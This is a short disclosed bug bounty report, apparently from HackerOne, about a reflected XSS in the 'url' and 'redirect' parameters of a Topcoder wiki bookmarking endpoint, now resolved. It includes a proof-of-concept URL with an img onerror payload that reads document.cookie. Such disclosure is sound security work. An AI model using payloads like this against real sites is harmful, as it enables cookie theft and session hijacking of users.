Reflected XSS on https://apps.topcoder.com/wiki/plugins/socialbookmarking/updatebookmark.action

Disclosed: 2020-05-12 13:41:20 By meryem0x To lab45
Medium
Vulnerability Details
## Summary: Hi :) A reflected XSS occurs when creating bookmarks. ## Steps To Reproduce: A user can create bookmarks on https://apps.topcoder.com/wiki/plugins/socialbookmarking/updatebookmark.action. In this url `redirect` and `url` parameters are vulnerable to XSS. PoC: `https://apps.topcoder.com/wiki/plugins/socialbookmarking/updatebookmark.action?url=Asd"><img src=X onerror=alert(document.domain)>&redirect=Asd"><img src=X onerror=alert(document.cookie)>` {F816796} {F816795} ## Impact XSS can use to steal cookies or to run arbitrary code on victim's browser.
Actions
View on HackerOne
Report Stats
  • Report ID: 866829
  • State: Closed
  • Substate: resolved
  • Upvotes: 3
Share this report